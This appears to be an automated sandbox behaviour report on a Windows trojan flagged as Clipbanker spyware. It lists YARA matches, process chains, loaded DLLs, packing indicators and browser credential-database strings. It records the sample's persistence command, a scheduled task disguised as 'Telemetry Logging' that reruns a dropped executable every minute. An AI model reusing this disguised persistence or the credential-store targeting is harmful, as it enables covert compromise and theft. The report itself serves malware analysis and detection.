Source: 11.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.2910452418.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.2910452418.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000008.00000002.2379318946.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000008.00000002.2379318946.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe, wfuiQLTtHXbQiC1ZxG.cs Cryptographic APIs: 'CreateDecryptor'
Source: file.exe, wfuiQLTtHXbQiC1ZxG.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@16/26@1/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C337030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 2_2_6C337030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00418120 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 2_2_00418120
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log Jump to behavior
Source: C:\Users\user\Desktop\file.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000002.00000002.2390906860.000000001B384000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2401574869.000000006C50F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2400696024.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000002.00000002.2390906860.000000001B384000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2401574869.000000006C50F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2400696024.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000002.00000002.2390906860.000000001B384000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2401574869.000000006C50F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2400696024.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000002.00000002.2390906860.000000001B384000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2401574869.000000006C50F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2400696024.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2390906860.000000001B384000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2401574869.000000006C50F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2400696024.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000002.00000002.2390906860.000000001B384000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2400696024.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000002.00000002.2390906860.000000001B384000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2401574869.000000006C50F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2400696024.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: IIIJECAEGDHIDHJKKKKF.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000002.00000002.2390906860.000000001B384000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2400696024.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000002.00000002.2390906860.000000001B384000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2400696024.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HJJDGHCBGD.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\HJJDGHCBGD.exe "C:\ProgramData\HJJDGHCBGD.exe"
Source: C:\ProgramData\HJJDGHCBGD.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HJJDGHCBGD.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\HJJDGHCBGD.exe "C:\ProgramData\HJJDGHCBGD.exe" Jump to behavior
Source: C:\ProgramData\HJJDGHCBGD.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\HJJDGHCBGD.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\HJJDGHCBGD.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\HJJDGHCBGD.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\HJJDGHCBGD.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2401013873.000000006C34D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2401574869.000000006C50F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: AVP.pdb source: file.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2401574869.000000006C50F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2401013873.000000006C34D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\ProgramData\HJJDGHCBGD.exe Unpacked PE file: 8.2.HJJDGHCBGD.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 11.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
.NET source code contains method to dynamically call methods (often used by packers)
Source: file.exe, wfuiQLTtHXbQiC1ZxG.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_004195E0
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
PE file contains sections with non-standard names
Source: HJJDGHCBGD.exe.2.dr Static PE information: section name: .MPRESS1
Source: HJJDGHCBGD.exe.2.dr Static PE information: section name: .MPRESS2
Source: msvcp140.dll.2.dr Static PE information: section name: .didat
Source: l2[1].exe.2.dr Static PE information: section name: .MPRESS1
Source: l2[1].exe.2.dr Static PE information: section name: .MPRESS2
Source: msvcp140[1].dll.2.dr Static PE information: section name: .didat
Source: nss3.dll.2.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr Static PE information: section name: .00cfg
Source: softokn3.dll.2.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.2.dr Static PE information: section name: .00cfg
Source: freebl3.dll.2.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.2.dr Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr Static PE information: section name: .00cfg
Source: oobeldr.exe.8.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.8.dr Static PE information: section name: .MPRESS2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041A9F5 push ecx; ret 2_2_0041AA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C30B536 push ecx; ret 2_2_6C30B549
Source: C:\ProgramData\HJJDGHCBGD.exe Code function: 8_2_006D50A5 push ebp; ret 8_2_00721C57
Source: file.exe Static PE information: section name: .text entropy: 7.733812863753211
